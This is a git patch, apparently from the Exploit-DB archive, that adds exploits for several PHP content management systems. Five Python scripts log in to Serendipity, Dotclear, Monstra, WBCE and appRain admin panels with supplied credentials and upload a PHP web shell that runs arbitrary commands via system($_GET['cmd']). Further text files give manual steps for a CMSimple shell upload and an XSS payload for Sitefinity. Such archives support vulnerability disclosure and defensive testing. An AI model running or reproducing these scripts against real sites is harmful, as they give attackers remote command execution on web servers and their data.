From 8a32e340d50f8ff6507c4fee2ad843f956a2df98 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Tue, 4 Jun 2024 00:16:25 +0000
Subject: [PATCH] DB: 2024-06-04

8 changes to exploits/shellcodes/ghdb

Sitefinity 15.0 - Cross-Site Scripting (XSS)

appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated)

CMSimple 5.15 - Remote Code Execution (RCE) (Authenticated)

Dotclear 2.29 - Remote Code Execution (RCE)

Monstra CMS 3.0.4 - Remote Code Execution (RCE)

Serendipity 2.5.0 - Remote Code Execution (RCE)

WBCE CMS v1.6.2 - Remote Code Execution (RCE)
---
 exploits/multiple/webapps/52035.txt |  23 ++++++
 exploits/php/webapps/52036.py       | 107 ++++++++++++++++++++++++++++
 exploits/php/webapps/52037.py       |  96 +++++++++++++++++++++++++
 exploits/php/webapps/52038.py       |  93 ++++++++++++++++++++++++
 exploits/php/webapps/52039.py       |  80 +++++++++++++++++++++
 exploits/php/webapps/52040.txt      |  14 ++++
 exploits/php/webapps/52041.py       |  72 +++++++++++++++++++
 files_exploits.csv                  |   7 ++
 8 files changed, 492 insertions(+)
 create mode 100644 exploits/multiple/webapps/52035.txt
 create mode 100755 exploits/php/webapps/52036.py
 create mode 100755 exploits/php/webapps/52037.py
 create mode 100755 exploits/php/webapps/52038.py
 create mode 100755 exploits/php/webapps/52039.py
 create mode 100644 exploits/php/webapps/52040.txt
 create mode 100755 exploits/php/webapps/52041.py

diff --git a/exploits/multiple/webapps/52035.txt b/exploits/multiple/webapps/52035.txt
new file mode 100644
index 0000000000..4b30fc5bf1
--- /dev/null
+++ b/exploits/multiple/webapps/52035.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Sitefinity 15.0 - Cross-Site Scripting (XSS)
+# Date: 2023-12-05
+# Exploit Author: Aldi Saputra Wahyudi
+# Vendor Homepage: https://www.progress.com/sitefinity-cms
+# Version: < 15.0.0
+# Tested on: Windows/Linux
+# CVE : CVE-2023-27636
+
+# Description: In the backend of the Sitefinity CMS, a Cross-site scripting vulnerability has been discovered in all features that use SF-Editor
+
+# Steps To Reproduce:
+
+Attacker as lower privilege
+Victim as Higher privilege
+
+1. Login as an Attacker
+2. Go to the function using the SF Editor, go to the news page as example
+3. Create or Edit news item
+4. On the content form, insert the XSS payload as HTML
+5. After the payload is inserted, click on the content form (just click) and publish or save
+6. If the victim visits the page with XSS payload, XSS will be triggered
+
+Payload: <noalert><iframe src="javascript:alert(document.domain);">
\ No newline at end of file
diff --git a/exploits/php/webapps/52036.py b/exploits/php/webapps/52036.py
new file mode 100755
index 0000000000..5e32f70714
--- /dev/null
+++ b/exploits/php/webapps/52036.py
@@ -0,0 +1,107 @@
+# Exploit Title: Serendipity 2.5.0 - Remote Code Execution (RCE)
+# Discovered by: Ahmet Ümit BAYRAM
+# Discovered Date: 26.04.2024
+# Vendor Homepage: https://docs.s9y.org/
+# Software Link:https://www.s9y.org/latest
+# Tested Version: v2.5.0 (latest)
+# Tested on: MacOS
+
+import requests
+import time
+import random
+import string
+from bs4 import BeautifulSoup
+
+def generate_filename(extension=".inc"):
+return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) +
+extension
+
+def get_csrf_token(response):
+soup = BeautifulSoup(response.text, 'html.parser')
+token = soup.find('input', {'name': 'serendipity[token]'})
+return token['value'] if token else None
+
+def login(base_url, username, password):
+print("Logging in...")
+time.sleep(2)
+session = requests.Session()
+login_page = session.get(f"{base_url}/serendipity_admin.php")
+token = get_csrf_token(login_page)
+data = {
+"serendipity[action]": "admin",
+"serendipity[user]": username,
+"serendipity[pass]": password,
+"submit": "Login",
+"serendipity[token]": token
+}
+headers = {
+"Content-Type": "application/x-www-form-urlencoded",
+"Referer": f"{base_url}/serendipity_admin.php"
+}
+response = session.post(f"{base_url}/serendipity_admin.php", data=data,
+headers=headers)
+if "Add media" in response.text:
+print("Login Successful!")
+time.sleep(2)
+return session
+else:
+print("Login Failed!")
+return None
+
+def upload_file(session, base_url, filename, token):
+print("Shell Preparing...")
+time.sleep(2)
+boundary = "---------------------------395233558031804950903737832368"
+headers = {
+"Content-Type": f"multipart/form-data; boundary={boundary}",
+"Referer": f"{base_url}
+/serendipity_admin.php?serendipity[adminModule]=media"
+}
+payload = (
+f"--{boundary}\r\n"
+f"Content-Disposition: form-data; name=\"serendipity[token]\"\r\n\r\n"
+f"{token}\r\n"
+f"--{boundary}\r\n"
+f"Content-Disposition: form-data; name=\"serendipity[action]\"\r\n\r\n"
+f"admin\r\n"
+f"--{boundary}\r\n"
+f"Content-Disposition: form-data; name=\"serendipity[adminModule]\"\r\n\r\n"
+f"media\r\n"
+f"--{boundary}\r\n"
+f"Content-Disposition: form-data; name=\"serendipity[adminAction]\"\r\n\r\n"
+f"add\r\n"
+f"--{boundary}\r\n"
+f"Content-Disposition: form-data; name=\"serendipity[userfile][1]\";
+filename=\"{filename}\"\r\n"
+f"Content-Type: text/html\r\n\r\n"
+"<html>\n<body>\n<form method=\"GET\" name=\"<?php echo
+basename($_SERVER['PHP_SELF']); ?>\">\n"
+"<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input
+type=\"SUBMIT\" value=\"Execute\">\n"
+"</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n}
+\n?>\n</pre>\n</body>\n</html>\r\n"
+f"--{boundary}--\r\n"
+)
+
+response = session.post(f"{base_url}
+/serendipity_admin.php?serendipity[adminModule]=media", headers=headers,
+data=payload.encode('utf-8'))
+if f"File {filename} successfully uploaded as" in response.text:
+print(f"Your shell is ready: {base_url}/uploads/{filename}")
+else:
+print("Exploit Failed!")
+
+def main(base_url, username, password):
+filename = generate_filename()
+session = login(base_url, username, password)
+if session:
+token = get_csrf_token(session.get(f"{base_url}
+/serendipity_admin.php?serendipity[adminModule]=media"))
+upload_file(session, base_url, filename, token)
+
+if __name__ == "__main__":
+import sys
+if len(sys.argv) != 4:
+print("Usage: python script.py <siteurl> <username> <password>")
+else:
+main(sys.argv[1], sys.argv[2], sys.argv[3])
\ No newline at end of file
diff --git a/exploits/php/webapps/52037.py b/exploits/php/webapps/52037.py
new file mode 100755
index 0000000000..85f6b9261d
--- /dev/null
+++ b/exploits/php/webapps/52037.py
@@ -0,0 +1,96 @@
+# Exploit Title: Dotclear 2.29 - Remote Code Execution (RCE)
+# Discovered by: Ahmet Ümit BAYRAM
+# Discovered Date: 26.04.2024
+# Vendor Homepage: https://git.dotclear.org/explore/repos
+# Software Link:
+https://github.com/dotclear/dotclear/archive/refs/heads/master.zip
+# Tested Version: v2.29 (latest)
+# Tested on: MacOS
+
+import requests
+import time
+import random
+import string
+from bs4 import BeautifulSoup
+
+def generate_filename(extension=".inc"):
+return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) +
+extension
+
+def get_csrf_token(response_text):
+soup = BeautifulSoup(response_text, 'html.parser')
+token = soup.find('input', {'name': 'xd_check'})
+return token['value'] if token else None
+
+def login(base_url, username, password):
+print("Exploiting...")
+time.sleep(1)
+print("Logging in...")
+time.sleep(1)
+session = requests.Session()
+login_data = {
+"user_id": username,
+"user_pwd": password
+}
+login_url = f"{base_url}/admin/index.php?process=Auth"
+login_response = session.post(login_url, data=login_data)
+if "Logout" in login_response.text:
+print("Login Successful!")
+return session
+else:
+print("Login Failed!")
+return None
+
+def upload_file(session, base_url, filename):
+print("Shell Preparing...")
+time.sleep(1)
+boundary = "---------------------------376201441124932790524235275389"
+headers = {
+"Content-Type": f"multipart/form-data; boundary={boundary}",
+"X-Requested-With": "XMLHttpRequest"
+}
+csrf_token = get_csrf_token(session.get(f"{base_url}
+/admin/index.php?process=Media").text)
+payload = (
+f"--{boundary}\r\n"
+f"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n"
+f"2097152\r\n"
+f"--{boundary}\r\n"
+f"Content-Disposition: form-data; name=\"xd_check\"\r\n\r\n"
+f"{csrf_token}\r\n"
+f"--{boundary}\r\n"
+f"Content-Disposition: form-data; name=\"upfile[]\"; filename=\"{filename}
+\"\r\n"
+f"Content-Type: image/jpeg\r\n\r\n"
+"<html>\n<body>\n<form method=\"GET\" name=\"<?php echo
+basename($_SERVER['PHP_SELF']); ?>\">\n"
+"<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input
+type=\"SUBMIT\" value=\"Execute\">\n"
+"</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n}
+\n?>\n</pre>\n</body>\n</html>\r\n"
+f"--{boundary}--\r\n"
+)
+upload_response = session.post(f"{base_url}
+/admin/index.php?process=Media&sortby=name&order=asc&nb=30&page=1&q=&file_mode=grid&file_type=&plugin_id=&popup=0&select=0",
+headers=headers, data=payload.encode('utf-8'))
+
+if upload_response.status_code == 200:
+print(f"Your Shell is Ready: {base_url}/public/{filename}")
+else:
+print("Exploit Failed!")
+
+def main(base_url, username, password):
+filename = generate_filename()
+session = login(base_url, username, password)
+if session:
+upload_file(session, base_url, filename)
+
+if __name__ == "__main__":
+import sys
+if len(sys.argv) != 4:
+print("Usage: python script.py <siteurl> <username> <password>")
+else:
+base_url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+main(base_url, username, password)
\ No newline at end of file
diff --git a/exploits/php/webapps/52038.py b/exploits/php/webapps/52038.py
new file mode 100755
index 0000000000..a9121a706f
--- /dev/null
+++ b/exploits/php/webapps/52038.py
@@ -0,0 +1,93 @@
+# Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (RCE)
+# Date: 05.05.2024
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://monstra.org/
+# Software Link: https://monstra.org/monstra-3.0.4.zip
+# Version: 3.0.4
+# Tested on: MacOS
+
+import requests
+import random
+import string
+import time
+import re
+import sys
+
+if len(sys.argv) < 4:
+print("Usage: python3 script.py <url> <username> <password>")
+sys.exit(1)
+
+base_url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+
+session = requests.Session()
+
+login_url = f'{base_url}/admin/index.php?id=dashboard'
+login_data = {
+'login': username,
+'password': password,
+'login_submit': 'Log+In'
+}
+
+filename = ''.join(random.choices(string.ascii_lowercase + string.digits, k=
+5))
+
+print("Logging in...")
+response = session.post(login_url, data=login_data)
+
+if 'Dashboard' in response.text:
+print("Login successful")
+else:
+print("Login failed")
+exit()
+
+time.sleep(3)
+
+edit_url = f'{base_url}/admin/index.php?id=themes&action=add_chunk'
+response = session.get(edit_url) # CSRF token bulmak için edit sayfasına
+erişim
+
+token_search = re.search(r'input type="hidden" id="csrf" name="csrf" value="
+(.*?)"', response.text)
+if token_search:
+token = token_search.group(1)
+else:
+print("CSRF token could not be found.")
+exit()
+
+content = '''
+<html>
+<body>
+<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
+<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
+<input type="SUBMIT" value="Execute">
+</form>
+<pre>
+<?php
+if(isset($_GET['cmd']))
+{
+system($_GET['cmd']);
+}
+?>
+</pre>
+</body>
+</html>
+'''
+
+edit_data = {
+'csrf': token,
+'name': filename,
+'content': content,
+'add_file': 'Save'
+}
+
+print("Preparing shell...")
+response = session.post(edit_url, data=edit_data)
+time.sleep(3)
+
+if response.status_code == 200:
+print(f"Your shell is ready: {base_url}/public/themes/default/{filename}
+.chunk.php")
+else:
+print("Failed to prepare shell.")
\ No newline at end of file
diff --git a/exploits/php/webapps/52039.py b/exploits/php/webapps/52039.py
new file mode 100755
index 0000000000..e761b7bbd9
--- /dev/null
+++ b/exploits/php/webapps/52039.py
@@ -0,0 +1,80 @@
+# Exploit Title: WBCE CMS v1.6.2 - Remote Code Execution (RCE)
+# Date: 3/5/2024
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://wbce-cms.org/
+# Software Link:
+https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.2.zip
+# Version: 1.6.2
+# Tested on: MacOS
+
+import requests
+from bs4 import BeautifulSoup
+import sys
+import time
+
+def login(url, username, password):
+print("Logging in...")
+time.sleep(3)
+with requests.Session() as session:
+response = session.get(url + "/admin/login/index.php")
+soup = BeautifulSoup(response.text, 'html.parser')
+form = soup.find('form', attrs={'name': 'login'})
+form_data = {input_tag['name']: input_tag.get('value', '') for input_tag in
+form.find_all('input') if input_tag.get('type') != 'submit'}
+# Kullanıcı adı ve şifre alanlarını dinamik olarak güncelle
+form_data[soup.find('input', {'name': 'username_fieldname'})['value']] =
+username
+form_data[soup.find('input', {'name': 'password_fieldname'})['value']] =
+password
+post_response = session.post(url + "/admin/login/index.php", data=form_data)
+if "Administration" in post_response.text:
+print("Login successful!")
+time.sleep(3)
+return session
+else:
+print("Login failed.")
+print("Headers received:", post_response.headers)
+print("Response content:", post_response.text[:500]) # İlk 500 karakter
+return None
+
+def upload_file(session, url):
+# Dosya içeriğini ve adını belirleyin
+print("Shell preparing...")
+time.sleep(3)
+files = {'upload[]': ('shell.inc',"""<html>
+<body>
+<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
+<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
+<input type="SUBMIT" value="Execute">
+</form>
+<pre>
+<?php
+if(isset($_GET['cmd']))
+{
+system($_GET['cmd']);
+}
+?>
+</pre>
+</body>
+</html>""", 'application/octet-stream')}
+data = {
+'reqid': '18f3a5c13d42c5',
+'cmd': 'upload',
+'target': 'l1_Lw',
+'mtime[]': '1714669495'
+}
+response = session.post(url + "/modules/elfinder/ef/php/connector.wbce.php",
+files=files, data=data)
+if response.status_code == 200:
+print("Your Shell is Ready: " + url + "/media/shell.inc")
+else:
+print("Failed to upload file.")
+print(response.text)
+
+if __name__ == "__main__":
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+session = login(url, username, password)
+if session:
+upload_file(session, url)
\ No newline at end of file
diff --git a/exploits/php/webapps/52040.txt b/exploits/php/webapps/52040.txt
new file mode 100644
index 0000000000..8bb1c6b8ea
--- /dev/null
+++ b/exploits/php/webapps/52040.txt
@@ -0,0 +1,14 @@
+# Exploit Title: CMSimple 5.15 - Remote Command Execution
+# Date: 04/28/2024
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.cmsimple.org
+# Software Link: https://www.cmsimple.org/downloads_cmsimple50/CMSimple_5-15.zip
+# Version: latest
+# Tested on: MacOS
+
+# Log in to SimpleCMS.
+# Go to Settings > CMS
+# Append ",php" to the end of the Extensions_userfiles field and save it.
+# Navigate to Files > Media
+# Select and upload shell.php
+# Your shell is ready: https://{url}/userfiles/media/shell.php
\ No newline at end of file
diff --git a/exploits/php/webapps/52041.py b/exploits/php/webapps/52041.py
new file mode 100755
index 0000000000..389d82dc38
--- /dev/null
+++ b/exploits/php/webapps/52041.py
@@ -0,0 +1,72 @@
+# Exploit Title: appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated)
+# Date: 04/28/2024
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.apprain.org
+# Software Link:
+https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip
+# Version: latest
+# Tested on: MacOS
+
+import requests
+import sys
+import time
+import random
+import string
+
+def generate_filename():
+""" Generate a 5-character random string for filename. """
+return ''.join(random.choices(string.ascii_lowercase, k=5)) + ".inc"
+
+def login(site, username, password):
+print("Logging in...")
+time.sleep(2)
+login_url = f"https://{site}/admin/system"
+session = requests.Session()
+login_data = {
+'data[Admin][admin_id]': username,
+'data[Admin][admin_password]': password
+}
+headers = {
+'Content-Type': 'application/x-www-form-urlencoded'
+}
+response = session.post(login_url, data=login_data, headers=headers)
+if "Logout" in response.text:
+print("Login Successful!")
+return session
+else:
+print("Login Failed!")
+sys.exit()
+
+def upload_shell(session, site):
+print("Shell preparing...")
+time.sleep(2)
+filename = generate_filename()
+upload_url = f"https://{site}/admin/filemanager/upload"
+files = {
+'data[filemanager][image]': (filename, "<html><body><form method='GET'
+name='<?php echo basename($_SERVER['PHP_SELF']); ?>'><input type='TEXT'
+name='cmd' autofocus id='cmd' size='80'><input type='SUBMIT'
+value='Execute'></form><pre><?php if(isset($_GET['cmd'])){
+system($_GET['cmd']); } ?></pre></body></html>", 'image/jpeg')
+}
+data = {
+'submit': 'Upload'
+}
+response = session.post(upload_url, files=files, data=data)
+if response.status_code == 200 and "uploaded successfully" in response.text:
+print(f"Your Shell is Ready: https://{site}/uploads/filemanager/{filename}")
+else:
+print("Exploit Failed!")
+sys.exit()
+
+if __name__ == "__main__":
+print("Exploiting...")
+time.sleep(2)
+if len(sys.argv) != 4:
+print("Usage: python exploit.py sitename.com username password")
+sys.exit()
+site = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+session = login(site, username, password)
+upload_shell(session, site)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 3536fa4eb0..94b9d8aee3 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -12250,6 +12250,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48712,exploits/multiple/webapps/48712.txt,"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)",2020-07-26,bdrake,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,,
 50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,,2021-06-30,2021-06-30,0,,,,,,
 51796,exploits/multiple/webapps/51796.txt,"SISQUALWFM 7.1.319.103 - Host Header Injection",2024-02-15,"Omer Shaik",webapps,multiple,,2024-02-15,2024-02-15,0,,,,,,
+52035,exploits/multiple/webapps/52035.txt,"Sitefinity 15.0 - Cross-Site Scripting (XSS)",2024-06-03,"Aldi Saputra Wahyudi",webapps,multiple,,2024-06-03,2024-06-03,0,CVE-2023-27636,,,,,
 33717,exploits/multiple/webapps/33717.txt,"Six Apart Vox - 'search' Page Cross-Site Scripting",2010-03-05,Phenom,webapps,multiple,,2010-03-05,2014-06-12,1,,,,,,https://www.securityfocus.com/bid/38575/info
 49415,exploits/multiple/webapps/49415.py,"SmartAgent 3.1.0 - Privilege Escalation",2021-01-12,"Orion Hridoy",webapps,multiple,,2021-01-12,2021-01-12,0,,,,,,
 48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple,,2020-06-12,2020-06-12,0,,,,,,
@@ -14155,6 +14156,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 38744,exploits/php/webapps/38744.txt,"appRain CMF - Multiple Cross-Site Request Forgery Vulnerabilities",2013-08-29,"Yashar shahinzadeh",webapps,php,,2013-08-29,2015-11-18,1,,,,,,https://www.securityfocus.com/bid/62061/info
 18392,exploits/php/webapps/18392.php,"appRain CMF 0.1.5 - 'Uploadify.php' Unrestricted Arbitrary File Upload",2012-01-19,EgiX,webapps,php,,2012-01-19,2012-06-22,0,CVE-2012-1153;OSVDB-78473,,,,http://www.exploit-db.comapprain-v015.zip,
 18249,exploits/php/webapps/18249.txt,"appRain CMF 0.1.5 - Multiple Web Vulnerabilities",2011-12-19,Vulnerability-Lab,webapps,php,,2011-12-19,2014-01-02,0,OSVDB-83187;OSVDB-83186;CVE-2011-5229;CVE-2011-5228,,,,http://www.exploit-db.comapprain-v015.zip,https://www.vulnerability-lab.com/get_content.php?id=362
+52041,exploits/php/webapps/52041.py,"appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated)",2024-06-03,"Ahmet Ümit BAYRAM",webapps,php,,2024-06-03,2024-06-03,0,,,,,,
 17508,exploits/php/webapps/17508.txt,"appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - Cross-Site Scripting",2011-07-08,"SecPod Research",webapps,php,,2011-07-08,2011-07-08,0,,,,,,http://secpod.org/advisories/SECPOD_AppRain_Multiple_XSS.txt
 27048,exploits/php/webapps/27048.txt,"AppServ Open Project 2.4.5 - Remote File Inclusion",2006-01-09,Xez,webapps,php,,2006-01-09,2013-07-23,1,CVE-2006-0125;OSVDB-22228,,,,,https://www.securityfocus.com/bid/16166/info
 31808,exploits/php/webapps/31808.txt,"AppServ Open Project 2.5.10 - 'appservlang' Cross-Site Scripting",2008-05-20,"CWH Underground",webapps,php,,2008-05-20,2014-02-21,1,CVE-2008-2398;OSVDB-45405,,,,,https://www.securityfocus.com/bid/29291/info
@@ -16080,6 +16082,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39273,exploits/php/webapps/39273.txt,"CMSimple 4.4.4 - 'color' Remote Code Execution",2014-07-28,"Govind Singh",webapps,php,,2014-07-28,2016-12-01,1,OSVDB-109777,,,,,https://www.securityfocus.com/bid/68961/info
 39272,exploits/php/webapps/39272.txt,"CMSimple 4.4.4 - Remote File Inclusion",2014-07-28,"Govind Singh",webapps,php,,2014-07-28,2016-11-17,1,OSVDB-109771,,,,,https://www.securityfocus.com/bid/68961/info
 32930,exploits/php/webapps/32930.txt,"CMSimple 4.4/4.4.2 - Remote File Inclusion",2014-04-18,NoGe,webapps,php,80,2014-04-18,2014-04-18,0,OSVDB-106017,,,,http://www.exploit-db.comCMSimple_44.zip,
+52040,exploits/php/webapps/52040.txt,"CMSimple 5.15 - Remote Code Execution (RCE) (Authenticated)",2024-06-03,"Ahmet Ümit BAYRAM",webapps,php,,2024-06-03,2024-06-03,0,,,,,,
 49751,exploits/php/webapps/49751.txt,"CMSimple 5.2 - 'External' Stored XSS",2021-04-08,"Quadron Research Lab",webapps,php,,2021-04-08,2021-04-08,0,,,,,,
 50612,exploits/php/webapps/50612.txt,"CMSimple 5.4 - Cross Site Scripting (XSS)",2022-01-05,heinjame,webapps,php,,2022-01-05,2022-01-05,0,,,,,,
 50547,exploits/php/webapps/50547.py,"CMSimple 5.4 - Local file inclusion (LFI) to Remote code execution (RCE) (Authenticated)",2021-11-24,S1lv3r,webapps,php,,2021-11-24,2021-11-24,0,,,,,,
@@ -17273,6 +17276,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 29838,exploits/php/webapps/29838.txt,"DotClear 1.2.x - '/ecrire/trackback.php?post_id' Cross-Site Scripting",2007-04-11,nassim,webapps,php,,2007-04-11,2013-11-27,1,CVE-2007-1989;OSVDB-34814,,,,,https://www.securityfocus.com/bid/23411/info
 29839,exploits/php/webapps/29839.txt,"DotClear 1.2.x - '/tools/thememng/index.php?tool_url' Cross-Site Scripting",2007-04-11,nassim,webapps,php,,2007-04-11,2013-11-27,1,CVE-2007-1989;OSVDB-34815,,,,,https://www.securityfocus.com/bid/23411/info
 51353,exploits/php/webapps/51353.txt,"dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)",2023-04-08,"Mirabbas Ağalarov",webapps,php,,2023-04-08,2023-04-08,0,,,,,,
+52037,exploits/php/webapps/52037.py,"Dotclear 2.29 - Remote Code Execution (RCE)",2024-06-03,"Ahmet Ümit BAYRAM",webapps,php,,2024-06-03,2024-06-03,0,,,,,,
 36888,exploits/php/webapps/36888.html,"Dotclear 2.4.1.2 - '/admin/auth.php?login_data' Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",webapps,php,,2012-02-29,2015-05-02,1,CVE-2012-1039;OSVDB-79697,,,,,https://www.securityfocus.com/bid/52221/info
 36889,exploits/php/webapps/36889.txt,"Dotclear 2.4.1.2 - '/admin/blogs.php?nb' Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",webapps,php,,2012-02-29,2015-05-02,1,CVE-2012-1039;OSVDB-79699,,,,,https://www.securityfocus.com/bid/52221/info
 36890,exploits/php/webapps/36890.txt,"Dotclear 2.4.1.2 - '/admin/comments.php' Multiple Cross-Site Scripting Vulnerabilities",2012-02-29,"High-Tech Bridge SA",webapps,php,,2012-02-29,2015-05-02,1,CVE-2012-1039;OSVDB-79698,,,,,https://www.securityfocus.com/bid/52221/info
@@ -23770,6 +23774,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48479,exploits/php/webapps/48479.txt,"Monstra CMS 3.0.4 - Authenticated Arbitrary File Upload",2020-05-18,"Kishan Lal Choudhary",webapps,php,,2020-05-18,2020-05-18,0,,,,,,
 44502,exploits/php/webapps/44502.txt,"Monstra cms 3.0.4 - Persitent Cross-Site Scripting",2018-04-23,"Wenming Jiang",webapps,php,,2018-04-23,2018-04-23,0,CVE-2018-10109,,,,http://www.exploit-db.commonstra-dev.zip,
 49949,exploits/php/webapps/49949.py,"Monstra CMS 3.0.4 - Remote Code Execution (Authenticated)",2021-06-04,"Ron Jost",webapps,php,,2021-06-04,2021-06-04,0,CVE-2018-6383,,,,http://www.exploit-db.commonstra-3.0.4.zip,
+52038,exploits/php/webapps/52038.py,"Monstra CMS 3.0.4 - Remote Code Execution (RCE)",2024-06-03,"Ahmet Ümit BAYRAM",webapps,php,,2024-06-03,2024-06-03,0,,,,,,
 44855,exploits/php/webapps/44855.py,"Monstra CMS < 3.0.4 - Cross-Site Scripting (1)",2018-06-07,DEEPIN2,webapps,php,,2018-06-07,2018-09-24,0,CVE-2018-10118,,,,,
 44646,exploits/php/webapps/44646.txt,"Monstra CMS < 3.0.4 - Cross-Site Scripting (2)",2018-05-18,"Berk Dusunur",webapps,php,,2018-05-18,2018-09-24,0,,,,,,
 45164,exploits/php/webapps/45164.txt,"Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Account Hijacking)",2018-08-07,"Nainsi Gupta",webapps,php,,2018-08-07,2018-08-13,0,,,,,,
@@ -29494,6 +29499,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51373,exploits/php/webapps/51373.txt,"Serendipity 2.4.0 - Cross-Site Scripting (XSS)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,,
 51403,exploits/php/webapps/51403.txt,"Serendipity 2.4.0 - File Inclusion RCE",2023-05-02,nu11secur1ty,webapps,php,,2023-05-02,2023-05-02,0,,,,,,
 51372,exploits/php/webapps/51372.txt,"Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,,
+52036,exploits/php/webapps/52036.py,"Serendipity 2.5.0 - Remote Code Execution (RCE)",2024-06-03,"Ahmet Ümit BAYRAM",webapps,php,,2024-06-03,2024-06-03,0,,,,,,
 35197,exploits/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",webapps,php,,2014-11-12,2014-11-12,0,OSVDB-114661;OSVDB-114660,,,,,
 45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comServerZilla_src.zip,
 10938,exploits/php/webapps/10938.txt,"Service d'upload 1.0.0 - Arbitrary File Upload",2010-01-03,indoushka,webapps,php,,2010-01-02,,0,,,,,,
@@ -32232,6 +32238,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50707,exploits/php/webapps/50707.py,"WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated)",2022-02-04,"Antonio Cuomo",webapps,php,,2022-02-04,2022-02-04,0,,,,,,
 51484,exploits/php/webapps/51484.txt,"WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)",2023-05-25,"Mirabbas Ağalarov",webapps,php,,2023-05-25,2023-05-25,1,,,,,,
 51566,exploits/php/webapps/51566.txt,"WBCE CMS 1.6.1 - Open Redirect & CSRF",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-07-03,0,,,,,,
+52039,exploits/php/webapps/52039.py,"WBCE CMS v1.6.2 - Remote Code Execution (RCE)",2024-06-03,"Ahmet Ümit BAYRAM",webapps,php,,2024-06-03,2024-06-03,0,,,,,,
 51986,exploits/php/webapps/51986.txt,"WBCE CMS Version 1.6.1 - Remote Command Execution (Authenticated)",2024-04-12,tmrswrr,webapps,php,,2024-04-12,2024-04-12,0,,,,,,
 51451,exploits/php/webapps/51451.txt,"WBiz Desk 1.2 - SQL Injection",2023-05-23,h4ck3r,webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 7337,exploits/php/webapps/7337.txt,"wbstreet 1.0 - SQL Injection / File Disclosure",2008-12-04,"CWH Underground",webapps,php,,2008-12-03,,1,OSVDB-51579;CVE-2008-5956;OSVDB-51575;CVE-2008-5955;OSVDB-50445;OSVDB-50444,,,,,